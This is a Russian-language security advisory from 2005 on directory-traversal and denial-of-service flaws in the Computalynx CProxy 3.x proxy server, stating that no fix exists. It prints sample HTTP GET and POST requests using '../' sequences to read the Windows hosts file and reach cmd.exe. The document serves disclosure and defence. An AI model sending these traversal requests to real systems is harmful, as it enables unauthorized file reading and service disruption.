Раскрытие информации и отказ в обслуживании в CProxy

Дата публикации:
04.03.2005
Всего просмотров:
1655
Опасность:
Низкая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Локальная сеть
Воздействие:
Отказ в обслуживании
Раскрытие важных данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Computalynx CProxy 3.x
Уязвимые версии: CProxy 3.3.x, 3.4 – 3.4.4

Описание:
Уязвимость позволяет злоумышленнику просмотреть произвольные файлы на системе и вызвать отказ в обслуживании.

Удаленный пользователь может с помощью символов обхода каталога получить доступ к произвольным данным на системе. Пример:

GET http://<path-to-target-directory>/<filename> HTTP/1.0<CRLF><CRLF>

GET http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0

Удаленный пользователь может с помощью GET запроса запросить ASCII файл и с помощью любого запроса затребовать исполняемые файлы и вызвать отказ в обслуживании приложения. Примеры:

GET http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0

GET http://../../../../../winnt/system32/cmd.exe

POST http://../../../../../winnt/system32/cmd.exe

URL производителя: http://www.computalynx.net/software/cproxy/default.asp

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Security Advisory: Computalynx CProxy Server Multiple Remote Vulnerabilities

или введите имя

CAPTCHA